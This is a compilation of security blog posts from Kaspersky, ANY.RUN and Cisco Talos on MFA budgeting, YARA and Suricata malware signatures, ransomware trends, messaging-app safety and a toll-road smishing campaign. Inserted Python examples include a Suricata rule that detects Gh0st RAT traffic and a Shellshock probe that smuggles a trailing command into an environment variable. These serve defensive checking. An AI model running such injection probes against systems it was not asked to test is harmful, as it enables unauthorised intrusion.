Many companies still lack basic infosec controls like multi-factor authentication. Even limited implementation of these controls significantly reduces the risk of compromise through credential theft. In addition to cost-effective solutions that utilize TOTP-based authenticator apps, 2025 has seen passkey-based solutions mature and become quite user-friendly on the major platforms (Microsoft, Google, Apple). This phishing-resistant, highly affordable authentication method is worth deploying at least for employees who have access to critical data and systems, and ideally, for everyone. Ultimately, the transition to passkeys can also improve efficiency for all employees, as password-free access saves time and reduces support costs for password-related issues.

Another aspect of IAM is centralized management of machine identities, API tokens, and other secrets. Due to a significant increase in attacks on cloud environments, investments in this area are likely unavoidable. However, many companies can strategically plan the implementation of appropriate tools by deploying open-source solutions in their infrastructure, utilizing secret managers included in their cloud provider subscriptions, and so on.

SOC cost management

Security operations centers (SOCs) represent a major expense in any infosec budget, with significant costs associated with analyst effort, data storage, and processing. Effective separation into “hot” and “cold” log storage can significantly reduce data storage costs. For large companies, it’s worth considering hierarchical or geographically distributed processing infrastructure. In some cases, such as with our SIEM – the Kaspersky Unified Monitoring and Analysis Platform – SIEM hardware savings can reach 50%.

Kaspersky official blog – ​Read More

Malware Trends Report, Q1 2025: Get Your Copy

What’s Inside the Report

Get your free copy of the report to save time on research

ANY.RUN’s Malware Trends Report provides a comprehensive analysis of the current cyber threat landscape. The report includes insights from malware and phishing samples analyzed by 15,000 companies and 500,000 analysts inside the Interactive Sandbox in Q1, 2025.

It enables organizations to save hours on research by offering actionable intelligence to enhance security resilience. Key threats covered in the report:

Previous Reports

ANY.RUN publishes quarterly malware trends reports along with the final annual report. Below are links to reports from 2024:

To see reports for 2023, please click here

Learn all about the most recent malware trends to keep track of growing threats and stay alert to protect your organization. 

About ANY.RUN

ANY.RUN’s services are used by SOC teams and companies across different industries, including finance, manufacturing, healthcare, and technology.

The Interactive Sandbox helps businesses ensure fast and accurate analysis of threats targeting Windows, Linux, & Android systems. It provides capabilities for hands-on and in-depth investigations of complex malware and phishing scenarios.

Threat Intelligence Lookup enables organizations to enrich their knowledge on active cyber attacks, while TI Feeds allow businesses to expand threat coverage and detection.


The post Malware Trends Report, Q1 2025: Get Your Copy appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Malware Signatures: How Cybersecurity Teams Use Them to Catch Threats 

Every piece of malware leaves traces behind. Sometimes it’s a string buried deep in the code. Other times it’s a mutex, a registry key, or a network pattern. The key is knowing what to look for. 

That’s exactly what malware signatures are for. They describe these recurring elements (unique strings, behaviors, or structural patterns) that can be used to reliably identify known threats. 

Security teams use these signatures to detect and flag malicious activity; sometimes before the malware even has a chance to do damage. 

In this article, we’ll break down what malware signatures are, the different types you’ll encounter, and how tools like YARA and Suricata help turn small clues into confident decisions. 

What Is a Malware Signature? 

A malware signature is a unique indicator tied to a specific piece of malicious software. It could be a text string, a file hash, a mutex, or even a sequence of behaviors. Security tools use these signatures to recognize and flag known threats, kind of like matching fingerprints at a crime scene. 

The goal is simple: spot malware based on something that consistently shows up across samples from the same family or campaign. Once identified, these signatures become part of detection rules used by antivirus engines, sandboxes, and intrusion detection systems. 

How Are Malware Signatures Created? 

Malware signatures are usually crafted by security researchers and automated detection systems after analyzing how a threat behaves or what it contains. 

When a new malware sample is discovered, analysts break it down, looking at code, memory behavior, registry changes, network traffic, and other markers. If they notice something unique or consistently present across samples, like a specific mutex name, string, or packet structure, that becomes a potential signature. 

Depending on the tool or platform, these signatures might take different forms: 

  • Static signatures are based on strings, byte sequences, or file hashes. 
  • Behavioral signatures are based on what the malware does, like creating certain processes or modifying the registry. 
  • Custom rules, like YARA or Suricata, allow analysts to define more complex patterns based on real-world observations. 

Main Types of Malware Signatures 

Not all malware looks or behaves the same, and the same goes for how we detect it. Over time, security teams have developed different types of signatures to match different kinds of threats.  

Here are the most common ones: 

Static Signatures 

These are the most traditional and widely used. Static signatures match fixed elements inside a file, like strings, byte sequences, or hashes, without needing to run the malware. 

Key traits: 

  • Match based on file content (strings, hex patterns, hashes) 
  • Fast and efficient for known threats 
  • Can be bypassed through obfuscation or slight code changes 
  • Commonly used in antivirus software  

Heuristic Signatures

Heuristic signatures look beyond exact matches. They evaluate the structure or logic of a file to identify suspicious patterns that may indicate malware, even if the sample is new or modified. 

Key traits: 

  • Detect threats based on suspicious code structures 
  • Useful for catching variants or zero-day malware 
  • May generate false positives if too broad 
  • Often found in email filters, AVs, and static analyzers 

Behavioral Signatures 

Rather than scanning a file, these signatures monitor what it does when executed. If it behaves like malware, e.g., injecting code or modifying the registry, it gets flagged. 

Key traits: 

  • Trigger on real-time actions and behaviors 
  • Great for catching fileless or evasive malware 
  • Requires sandboxing or endpoint monitoring 
  • Common in EDRs, sandboxes, and dynamic analysis tools 


How Detection Tools Use Signatures: YARA and Suricata 

Once malware signatures are defined, they need to be used effectively, and that’s where tools like YARA and Suricata come in. Each serves a unique purpose: one focuses on files and memory, the other on network traffic. Together, they cover a wide range of threats and detection angles. 

YARA Signatures: Matching Patterns in Files and Processes 

YARA is a rule-based detection tool that helps analysts identify malware by describing textual or binary patterns. It’s especially powerful for hunting threats across memory dumps, unpacked payloads, or large malware datasets. 

YARA helps security teams quickly identify threats by matching known patterns in files, processes, or memory. It automates what would otherwise be a slow, manual process, making detection faster, more accurate, and more scalable. 

Its real strength lies in customization. Teams can write tailored rules to catch specific malware strains or adapt to new threats as they emerge. When combined with ANY.RUN’s Interactive Sandbox, a YARA match is paired with the sample’s observed behavior, giving organizations the insight they need to act fast and prevent damage. 

Key benefits of YARA in a security workflow: 

  • Speeds up detection and reduces manual effort 
  • Detects both known and emerging malware families 
  • Cuts down false positives with precise rules 
  • Boosts efficiency across security teams 
  • Helps contain threats early and minimize risk 

Real-World Example: Matching the Mutex Pattern 

YARA rule example pulled from ANY.RUN sandbox analysis 

Let’s look at an example of YARA rule used in ANY.RUN’s sandbox: 

$s6 = "Local\\SM0:%d:%d:%hs" wide 

This string is part of a rule designed to detect the mutex-name template used by certain malware families. In YARA syntax the backslash is written as \\, and the wide modifier tells YARA to search for the UTF-16LE encoding of the string rather than its ASCII form.

To see this signature in action, check out this ANY.RUN analysis session

Checking mutex signature inside ANY.RUN sandbox 

Navigate to the MediaCenter.exe process → More Info → Synchronization tab. 

There, you’ll find the mutex: Local\SM0:5320:168:WilStaging_02 

YARA-based mutex signature detected inside ANY.RUN sandbox

This observed name is an instance of the template, not a literal match for the YARA string. %d and %hs are printf-style conversion specifiers that the malware’s own code fills in at runtime (here with two decimal values and the narrow string WilStaging_02); YARA does not interpret them. What the rule finds is the unformatted format string itself, stored as UTF-16LE (hence the wide modifier) in the binary or in process memory. Matching the template rather than any one formatted name is what makes the rule robust: the process IDs and counters change from run to run, the format string does not. 

  • %d is replaced with a signed decimal integer 
  • %hs is replaced with a narrow (single-byte) character string, in Microsoft’s wide-string format conventions 

To match the formatted mutex names themselves, as they appear in the Synchronization tab or in sandbox logs, you translate the specifiers into a regular expression or a behavioral rule. The static YARA hit on the template and the runtime observation of a concrete name then confirm each other. 
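
To make the distinction concrete, here is an added example (my own Python, not code from the ANY.RUN post or from the YARA project). It does the two things described above, and it also ties together the static and behavioral signature types from earlier in the article: it searches a constructed byte buffer for the format string the way YARA’s wide modifier does (UTF-16LE), and it translates the same printf template into a regex that recognises the formatted mutex names a sandbox reports. The rule name, the buffer, and every mutex name except the one quoted above are constructed for the example; the regex translation handles only the common conversion specifiers and ignores width and precision flags.

```python
import re

# Added example (not code from the ANY.RUN post). It demonstrates what the
# YARA text string below actually matches and how the same format string is
# turned into a regex for the formatted mutex names a sandbox reports.

# The $s6 line is the one shown in the post, wrapped in a rule whose name is
# my own. In YARA text strings a backslash must be written as \\ and `wide`
# means the string is searched for in UTF-16LE encoding.
YARA_RULE = r'''
rule sm0_mutex_format_string
{
    strings:
        $s6 = "Local\\SM0:%d:%d:%hs" wide
    condition:
        $s6
}
'''

FORMAT_STRING = "Local\\SM0:%d:%d:%hs"   # the Python view of the same literal


def find_string(image: bytes, text: str, wide: bool = True) -> list[int]:
    """Offsets at which `text` occurs in `image`, encoded the way YARA's
    `wide` (UTF-16LE) or default ascii modifier would encode it."""
    needle = text.encode("utf-16-le" if wide else "ascii")
    offsets, start = [], 0
    while (idx := image.find(needle, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets


# Conversion letter -> regex fragment for the runtime value it produces.
_CONV = {
    "d": r"-?\d+", "i": r"-?\d+", "u": r"\d+",
    "x": r"[0-9a-f]+", "X": r"[0-9A-F]+",
    "s": r".+?", "c": r".",
}
# %% or %[hlw]<conversion>; flags, width and precision are not handled here.
_SPEC = re.compile(r"%(%|[hlw]*[diuxXsc])")


def format_string_to_regex(fmt: str) -> re.Pattern:
    """Translate a printf-style template into a regex with one capture
    group per conversion specifier. Literal text is escaped verbatim."""
    parts, pos = [], 0
    for m in _SPEC.finditer(fmt):
        parts.append(re.escape(fmt[pos:m.start()]))
        spec = m.group(1)
        parts.append("%" if spec == "%" else "(" + _CONV[spec[-1]] + ")")
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return re.compile("".join(parts))


def match_mutexes(fmt: str, names: list[str]) -> list[tuple[str, tuple]]:
    """Runtime mutex names that are instances of `fmt`, with the values
    that filled each specifier."""
    pattern = format_string_to_regex(fmt)
    hits = []
    for name in names:
        m = pattern.fullmatch(name)
        if m:
            hits.append((name, m.groups()))
    return hits


# Constructed stand-in for a binary or memory dump: 16 bytes of header
# filler, then the format string as UTF-16LE with its NUL terminator.
SAMPLE_IMAGE = (b"MZ" + b"\x00" * 14
                + FORMAT_STRING.encode("utf-16-le") + b"\x00\x00"
                + b"\x90" * 8)

# Names as the sandbox Synchronization tab would list them. The first is the
# one from the post; the rest are constructed: a second instance, an
# unrelated mutex, and a name %d could never have produced.
OBSERVED_MUTEXES = [
    "Local\\SM0:5320:168:WilStaging_02",
    "Local\\SM0:4412:168:WilStaging_02",
    "Global\\SomeUnrelatedMutex",
    "Local\\SM0:abc:168:WilStaging_02",
]

if __name__ == "__main__":
    print("wide hits :", find_string(SAMPLE_IMAGE, FORMAT_STRING, wide=True))
    print("ascii hits:", find_string(SAMPLE_IMAGE, FORMAT_STRING, wide=False))
    for name, values in match_mutexes(FORMAT_STRING, OBSERVED_MUTEXES):
        print(f"{name} <- {values}")
```

Running it prints the offset of the wide string (and no hit for the ASCII encoding, which is why the modifier matters) and the two names that are instances of the template. The same translation is handy for turning format strings recovered during static analysis into detection regexes for EDR or sandbox logs.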



Suricata Signatures: Detecting Malicious Behavior in Network Traffic 

While YARA focuses on identifying malware based on what it is, Suricata helps detect malware based on what it does across the network. It’s an advanced intrusion detection system (IDS) that monitors real-time traffic and flags suspicious behavior using both signature- and anomaly-based techniques. 

ANY.RUN integrates Suricata to enhance threat visibility at the network level, allowing analysts to catch threats as they try to communicate with command-and-control servers, exfiltrate data, or spread laterally. Suricata signatures give security teams immediate context; what’s happening, where, and why it matters. 

Click on the Threats tab inside ANY.RUN sandbox to view all threats detected by Suricata rules   

Key benefits of Suricata in a security workflow: 

  • Detects malicious traffic and C2 communication in real time 
  • Complements file-based detection with network-layer visibility 
  • Helps attribute threats to specific malware families 
  • Speeds up incident response with actionable alerts 
  • Empowers teams with visibility into protocol activity across multiple layers 

Suricata Rule Example from ANY.RUN Sandbox Analysis

In ANY.RUN, Suricata rules are applied automatically during sandbox analysis. Let’s take a look at a real-world detection involving Gh0st Remote Access Trojan (RAT). 

View analysis session with Gh0st RAT 

Suricata rule triggered by Gh0st RAT inside ANY.RUN 

After execution, the sample initiates suspicious encrypted traffic. Suricata instantly detects it and flags the connection as Gh0st RAT activity.

Gh0st RAT detected by Suricata 

How it works: 

  • Suricata inspects packets across protocols (HTTP, TCP, UDP, etc.) 
  • It matches patterns defined in the ET (Emerging Threats) rule sets 
  • Once a match is found, it provides detailed metadata: source/destination IPs, ports, signature ID, and threat name 

Clicking on a threat from the list reveals its details 

By switching to the Suricata rule tab, you’ll be able to inspect it more thoroughly.  

Suricata signature displayed inside the ANY.RUN sandbox 
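
As an added example (my own Python, not ANY.RUN’s or Suricata’s code), the following script parses a Suricata rule into its header and options and then triages eve.json alert records the way you would read the Threats tab: which signature fired, how often, against which destinations. The rule is a constructed local rule in the style of the ET rule sets with a placeholder sid; the 5-byte Gh0st header it looks for is taken from public descriptions of the classic Gh0st RAT protocol rather than from the post. The EVE lines are constructed from Suricata’s documented alert fields and include a non-alert event and a corrupt line to show that triage should skip both rather than abort.

```python
import json
from collections import defaultdict

# Added example, not ANY.RUN's or Suricata's code. It parses a Suricata rule
# into header and options, then triages constructed eve.json alert lines.

# Constructed local rule in the style of the ET rule sets. The sid is in the
# local (1000000+) range; the 5-byte "Gh0st" header comes from public
# descriptions of the classic Gh0st RAT protocol, not from the post.
SAMPLE_RULE = (
    'alert tcp $HOME_NET any -> $EXTERNAL_NET any '
    '(msg:"LOCAL MALWARE Gh0st-style RAT header outbound"; '
    'flow:established,to_server; content:"Gh0st"; depth:5; '
    'classtype:trojan-activity; sid:1000001; rev:1;)'
)

# Constructed eve.json lines using Suricata's documented alert fields.
# The second line is a non-alert event and the last is corrupt; both must
# be skipped without aborting the run. IPs are documentation ranges.
SAMPLE_EVE = "\n".join([
    json.dumps({"timestamp": "2025-04-01T10:15:22.000000+0000", "flow_id": 1,
                "event_type": "alert", "src_ip": "10.0.0.5", "src_port": 49152,
                "dest_ip": "203.0.113.10", "dest_port": 8080, "proto": "TCP",
                "alert": {"action": "allowed", "gid": 1, "signature_id": 1000001,
                          "rev": 1, "signature": "LOCAL MALWARE Gh0st-style RAT header outbound",
                          "category": "A Network Trojan was detected", "severity": 1}}),
    json.dumps({"timestamp": "2025-04-01T10:15:23.000000+0000", "flow_id": 1,
                "event_type": "flow", "src_ip": "10.0.0.5", "dest_ip": "203.0.113.10"}),
    json.dumps({"timestamp": "2025-04-01T10:16:02.000000+0000", "flow_id": 2,
                "event_type": "alert", "src_ip": "10.0.0.5", "src_port": 49170,
                "dest_ip": "203.0.113.10", "dest_port": 443, "proto": "TCP",
                "alert": {"action": "allowed", "gid": 1, "signature_id": 1000001,
                          "rev": 1, "signature": "LOCAL MALWARE Gh0st-style RAT header outbound",
                          "category": "A Network Trojan was detected", "severity": 1}}),
    '{"timestamp": "2025-04-01T10:16:05',
])


def parse_rule(rule: str) -> dict:
    """Split a Suricata rule into header fields and options.
    Simplified: escaped ';' or '"' inside option values are not handled."""
    header, _, body = rule.strip().partition("(")
    if not body.endswith(")"):
        raise ValueError("rule options must end with ')'")
    action, proto, src, sport, direction, dst, dport = header.split()
    opts = defaultdict(list)
    for opt in body[:-1].split(";"):
        opt = opt.strip()
        if opt:
            key, _, value = opt.partition(":")
            opts[key.strip()].append(value.strip().strip('"'))
    return {
        "action": action, "proto": proto, "src": src, "sport": sport,
        "direction": direction, "dst": dst, "dport": dport,
        "msg": opts["msg"][0], "sid": int(opts["sid"][0]),
        "rev": int(opts["rev"][0]) if opts["rev"] else 0,
        "classtype": opts["classtype"][0] if opts["classtype"] else None,
        "content": opts["content"],
    }


def parse_eve_alerts(lines) -> list[dict]:
    """Keep only well-formed records whose event_type is "alert"."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if event.get("event_type") == "alert" and "alert" in event:
            alerts.append(event)
    return alerts


def summarize_alerts(alerts: list[dict]) -> dict[int, dict]:
    """Group alerts by signature id: name, severity, count, destinations."""
    summary: dict[int, dict] = {}
    for ev in alerts:
        a = ev["alert"]
        entry = summary.setdefault(a["signature_id"], {
            "signature": a["signature"], "severity": a["severity"],
            "count": 0, "destinations": set()})
        entry["count"] += 1
        entry["destinations"].add(f'{ev["dest_ip"]}:{ev["dest_port"]}')
    for entry in summary.values():
        entry["destinations"] = sorted(entry["destinations"])
    return summary


if __name__ == "__main__":
    rule = parse_rule(SAMPLE_RULE)
    print(f'sid {rule["sid"]} rev {rule["rev"]}: {rule["msg"]} content={rule["content"]}')
    for sid, e in summarize_alerts(parse_eve_alerts(SAMPLE_EVE.splitlines())).items():
        print(f'sid {sid} x{e["count"]} sev {e["severity"]} -> {", ".join(e["destinations"])}')
```

The rule parser is deliberately simple: it splits options on ';' and does not handle Suricata’s escaped ';' or '"' inside content values, so use it on rules you control. Grouping by signature_id rather than by signature text matters because the msg of a rule can change between revisions while the sid stays stable.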

Making the Most of Malware Signatures in ANY.RUN 

Malware signatures can do a lot on their own, but when they’re used in the right environment, they become even more useful. 

Inside ANY.RUN’s sandbox, YARA and Suricata work together to give you the full picture. You can see what a file is doing locally, spot mutexes, registry changes, and other signs of malicious behavior, then switch to the network layer to catch things like encrypted C2 traffic or data exfiltration. Both angles are covered, without having to jump between tools. 

Instead of switching between tools, analysts get everything in one place: interactive, real-time, and backed by constantly updated signature sets. That means less time digging and more time acting. 

If your goal is to reduce investigation time, improve detection accuracy, and truly understand how malware behaves, ANY.RUN puts those capabilities right at your fingertips. 

About ANY.RUN

ANY.RUN is used by over 500,000 cybersecurity professionals and 15,000+ companies across finance, manufacturing, healthcare, and other industries. Its Interactive Sandbox offers fast threat analysis for Windows, Linux, and Android, aiding malware and phishing investigations. Threat Intelligence Lookup and TI Feeds enhance cyber attack knowledge and detection.


The post Malware Signatures: How Cybersecurity Teams Use Them to Catch Threats  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Year in Review: The biggest trends in ransomware

This week, our Year in Review spotlight is on ransomware—where low-profile tactics led to high-impact consequences.

Ransomware operators often prioritized stealth over complexity for initial access. They also focused on slipping past defenses with minimal noise—uninstalling security tools, creating new firewall rules for remote access, and using common, freely available tools.

The ransomware-as-a-service landscape also paints an interesting picture. A new player quickly rose through the ranks, becoming the second most prolific operator by targeting large payouts.

Something that hasn’t really changed over the years is the sectors that ransomware actors target most heavily – favouring industries that typically have lower security budgets, irregular monitoring, but highly sensitive data.

We’ve pulled together the most significant insights in a quick, 2-page PDF:

Only have 55 seconds? Watch this video:

For the full analysis, download Talos’ 2024 Year in Review.

Cisco Talos Blog – ​Read More

12 tips on how to use WhatsApp, Telegram, Signal, Viber, WeChat, and other messaging apps safely | Kaspersky official blog

How do you keep your chats private and protect your messaging account from being stolen or hacked? Here are 12 simple rules with brief explanations of why each one is important.

Enable two-factor authentication

Why this is important. It keeps your account from being hacked or hijacked through SIM swapping or some other technique. Turning on this setting requires entering your secret password in addition to the SMS verification code when signing in to the messaging app with your account on a new device.

What to do. Open the security and privacy settings of your messaging app, enter a secret password, and memorize it. You’ll only need to enter it when linking a new device to your account. To make things easier, you can generate and store it in a secure password manager, or test the strength of your password using our free Kaspersky Password Checker.

Don’t share one-time passwords

Why this is important. If scammers want to steal your account, they’ll try to trick you into giving them the verification code after you receive it in your messaging app.

What to do. Don’t forward or dictate one-time passwords for signing in to chat apps to anyone. Your friends, support agents, companies, or banks will never need these codes. If someone is asking for a code, it’s a scammer.

Never scan QR codes outside of the messaging app

Why this is important. Some account hijacking schemes masquerade as invitations to join a group or chat. You scan a QR code in an ad, but instead of joining a neighborhood or class chat, you allow a scammer to link their device to your account.

What to do. If someone is asking you to scan a QR code, find the scanner in the messaging app — typically in the Settings. Don’t use your camera or some other QR-code scanning app. Carefully read the prompts displayed by the messaging app: it’ll tell you whether you’re joining a group or channel, or linking a new device to your account.

Carefully check new contact requests

Why this is important. Scammers typically imitate people you know: “Hi! Me again. I’ve a new phone number”. They may even know who your boss is. Many scams that result in major financial losses start with requests from “friends” or “colleagues”. Another type of attack is a “misdialed call” scam. “Is this Hannah? It’s not? Oh, sorry! I misdialed. Anyway, how are things?”

What to do. If you see a new chat, but there’s no history, stay alert! If this is supposedly an acquaintance, ask them about something only they would know. If your boss is texting you, it’s best to confirm it with them directly through a different channel, such as their office phone, work email, or in person, before proceeding. If you get a message from someone claiming it was sent in error, ignore any enticing offers, especially if accompanied by links or files.

Use the block feature

Why this is important. It’s the best way to get rid of stalkers, scammers, and clinging exes.

What to do. Don’t ignore spammers or scammers from the previous tip. Every chat app has a “Block user” button — don’t hesitate to press it! This will prevent the scammer from writing you again — or, after several reports, anyone else. This button is also a great way to minimize reminders of those unpleasant people from your past.

Think before you open a link — even if it’s from a friend

Why this is important. Your friends are vulnerable too. Scammers can compromise their accounts, then use them to send manipulative messages — pleas for help or provocations — to everyone in their contact list, aiming to extort money or hijack further accounts.

What to do. Steer clear of suspicious website links, unfamiliar file attachments, pleas for cash, requests to vote in dubious contests, messages like, “Is that really you in that photo?”, and unexpected, too-good-to-be-true offers like free premium subscriptions. To ensure you don’t stumble into these traps, delete such messages on sight. If they appear to be from someone you know, reach out using another channel, and alert them to the suspicious activity occurring under their name. If you act quickly, you might be able to help your friends recover their accounts, as 24 hours is often all there is to do so.

Restrict access to your smartphone and messaging app

Why this is important. If your phone gets stolen, or you give it to a friend, coworker, or relative, access control will keep anyone from snooping on your chats.

What to do. Enable screen lock: fingerprint, Face ID, or a long PIN. Also, enable App Lock in the phone settings or messaging app itself. Your fingerprint or PIN will be required to open the app every time. Even if you give someone an unlocked phone, they won’t be able to use the chat app.

Turn off message previews

Why this is important. A locked phone screen may display highly sensitive data: from private messages to verification codes from the bank.

What to do. Disable message previews on the lock screen. You can do that in the “Notifications” section of the phone settings.

Use disappearing and one-time-view messages

Why this is important. If you’re sharing things like Wi-Fi passwords, booking details, or your home address, which are only needed for a moment, don’t leave them in your chat history to haunt you later. What if one of you gets hacked?

What to do. When sharing sensitive data, apply either an auto-delete timer for messages or the “view once” setting, depending on the situation. If neither is an appropriate option, set a reminder to revisit the chat and delete the message for both users after an hour, day, or week.

Added bonus. This looks cool and helps keep the chat uncluttered.

Don’t send nudes!

Why this is important. Even if it’s just a one-time view message, the picture might be shown to people around or screenshotted and then used against you.

What to do. Avoid sharing anything that could upset, embarrass, jeopardize, or open you up to blackmail if published. This is true for any private information, not just nudes. If your nudes have already been leaked online, there might still be a chance to get them removed.

Be careful with group chats

Why this is important. You probably trust your friends. But how well do you know the people your friends add to groups?

What not to do. Don’t share your phone numbers, addresses, or other sensitive (your own as well as others’) personal information in large chats.

Limit your profile visibility

Why this is important. Neither scammers nor strangers need to see your profile photo or know when you were last seen online.

What to do. Open the Privacy section in the chat app settings and choose who can see your “Last Seen”, “Profile Photo”, “Status”, and so on. By default, this data is visible to everyone. Adjust the settings to your preference, choosing either “My Contacts” or “Nobody”.

Read other stories to find out how to adjust security and privacy settings in specific messaging apps, and what to do if you’ve been targeted by scammers or had your account compromised:

Kaspersky official blog – ​Read More

Threat actors thrive in chaos

Welcome to this week’s edition of the Threat Source newsletter. 

If there’s one thing that threat actors love, it’s chaos. Headlines in the news that provoke an emotional response make excellent phishing lures because the intense feelings invoked by a provocative subject line cause our critical thinking faculties to be bypassed. Without cautious reflection, we’re likely to engage with bait, fall for the lure and “click the link” rather than pausing to ask ourselves what the headline’s writer is trying to achieve. 

Economic disruption also works in the bad guys’ favor. In budgetary crises, investments in cyber defenses may be postponed or the hiring of sorely needed additional team members delayed. Alternatively, an end-of-life device that is still functional despite obsolescence and many unpatched vulnerabilities may get an additional year of operation before replacement. 

In such a climate, security teams are often asked to do more with less. However, security can be improved simply by getting the basics right and addressing gaps that don’t require investment. Patching might be time-consuming, but it doesn’t require extra budget. Prioritize patching the most exploited vulnerabilities as listed in our 2024 Year in Review report. Next, review your MFA implementation, ensuring that it is deployed everywhere throughout the organization and that it can’t be bypassed. 

When times are tough, focus on getting the basics right and fixing what can be fixed without needing costly investment. Each vulnerability fixed, each weakness remediated helps move the security posture forwards and makes your organization a tougher target for the bad guys who in turn are more likely to seek easier quarry.

The one big thing 

We are continuing our discussion of Talos’ 2024 Year in Review report, looking at each section in detail. This week, let’s examine the evolution of email lures and the nature of the most frequently targeted vulnerabilities.

Why do I care? 

In a world of limited resources, effective defense requires identifying areas that are more likely to be targeted by threat actors and prioritizing shoring up these areas. Not all vulnerabilities or systems are exploited equally, and remediating the most frequently exploited vulnerabilities maximizes security effectiveness. 

So now what? 

Educate users on the types of social engineering that threat actors are currently using in email lures. Social engineering is not static but constantly changing to try and outwit unwary targets. 

Exploitation of the Shellshock series of vulnerabilities should not still be continuing more than 10 years after disclosure. Aggressively identify systems within your IT estate that are vulnerable to this attack and urgently patch them.
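
A quick way to carry out that identification on a host is the public CVE-2014-6271 probe, shown here as an added Python wrapper of my own (not a Talos tool). It puts a function definition with a trailing command into an environment variable and runs bash; a vulnerable bash executes the trailing command while importing the variable, a patched one does not. The marker token is arbitrary. The probe covers only the original Shellshock bug, not the follow-on CVEs, and a clean result on an interactive bash says nothing about services such as CGI scripts that pass attacker-controlled input into environment variables, which is where exploitation actually happens.

```python
import os
import shutil
import subprocess
from typing import Optional

# Added example, not Talos's code. It runs the public CVE-2014-6271 probe
# against a local bash: an environment variable holding a function body
# followed by a trailing command. A vulnerable bash executes the trailing
# command while importing the variable; a patched bash does not.

MARKER = "SHELLSHOCK_IMPORT_EXECUTED"   # arbitrary token, chosen here


def check_shellshock(bash: Optional[str] = None) -> Optional[bool]:
    """True if `bash` executes the trailing command (vulnerable to
    CVE-2014-6271), False if not, None if bash cannot be run."""
    bash = bash or shutil.which("bash")
    if bash is None:
        return None
    env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        # The classic probe: function definition, then a trailing command.
        "x": "() { :;}; echo " + MARKER,
    }
    try:
        proc = subprocess.run([bash, "-c", "echo probe"], env=env,
                              capture_output=True, text=True, timeout=15)
    except (OSError, subprocess.SubprocessError):
        return None
    # Patched bash prints only "probe" (and possibly a warning on stderr);
    # vulnerable bash prints the marker first.
    return MARKER in proc.stdout


def bash_report(bash: Optional[str] = None) -> dict:
    """Inventory record: version banner plus probe result, for fleet checks."""
    bash = bash or shutil.which("bash")
    version = None
    if bash:
        try:
            out = subprocess.run([bash, "--version"], capture_output=True,
                                 text=True, timeout=15).stdout
            version = out.splitlines()[0] if out else None
        except (OSError, subprocess.SubprocessError):
            pass
    return {"bash": bash, "version": version, "vulnerable": check_shellshock(bash)}


if __name__ == "__main__":
    print(bash_report())
```

Run it from an inventory or configuration-management job and collect the returned dict per host; a True result (or a bash version predating the 2014 fixes) is a patch-now item.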

Top security headlines of the week 

Hackers strike Australia’s largest pension funds. A series of coordinated attacks has reportedly led to criminals compromising in excess of 20,000 pension accounts and stealing funds. (Reuters)

Ireland Plans 300-Strong Military Cyber Command. The Irish armed forces are creating a Joint Cyber Defence Command to support defensive and offensive cyber operations. (Irish Times)

Baltimore City Falls Victim to Vendor Fraud. Two payments totaling $1.5 million were reportedly paid to a fraudulent bank account that had been swapped for a contractor’s genuine account. (CBS News)

CISA Warns of Vulnerabilities in ICS Software. The U.S. Cybersecurity and Infrastructure Security Agency released advisories relating to five serious vulnerabilities in Industrial Control Systems software. (CISA)

Can’t get enough Talos?

  • Unraveling the U.S. toll road smishing scams. Talos has observed a widespread and ongoing smishing campaign since October 2024 that targets toll road users in the U.S. Read the blog here.
  • Beers with Talos: 2024 Year in Review. Joe, Hazel, Bill and Dave break down the 2024 Year in Review and discuss how and why cybercriminals are leaning on attacks built on stealth and simplicity. Listen here.
  • The TTP Ep 10 (Part 1). Peeling back the layers of the threats that dominated 2024. Watch now.
  • The TTP Ep 10 (Part 2). Ransomware groups, and why we’re seeing more identity attacks. Watch now.

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details 
Typical Filename: VID001.exe   
Detection Name: Simple_Custom_Detection

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376  
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details 
Typical Filename: IMG001.exe 
Detection Name: Simple_Custom_Detection  

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca    
MD5: 71fea034b422e4a17ebb06022532fdde    
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 
Typical Filename: VID001.exe   
Detection Name: Coinminer:MBT.26mw.in14.Talos   

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b 
MD5: f5e908f1fac5f98ec63e3ec355ef6279 
VirusTotal: https://www.virustotal.com/gui/file/7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b/details 
Typical Filename: IMG001.exe 
Detection Name: Win.Dropper.Coinminer::tpd 

Cisco Talos Blog – ​Read More

Unraveling the U.S. toll road smishing scams

  • Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America.  
  • We observed that the campaign targets people across several states in the U.S. according to the domain names used in the smishing messages. 
  • Talos assesses with moderate confidence that the toll road smishing attacks are being carried out by multiple financially motivated threat actors using the smishing kit developed by “Wang Duo Yu”, according to the intelligence obtained by Talos. 

Toll road smishing attacks 

Since the middle of Oct. 2024, Talos has seen ongoing smishing attacks impersonating U.S. toll road automatic payment services (such as E-ZPass) with the intent of financial theft. The actors have so far sent SMS messages to individuals in about eight states in the U.S., including Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois and Kansas. Talos identified these states via spoofed domains containing the states’ two-letter abbreviations that we observed in the SMS messages. 

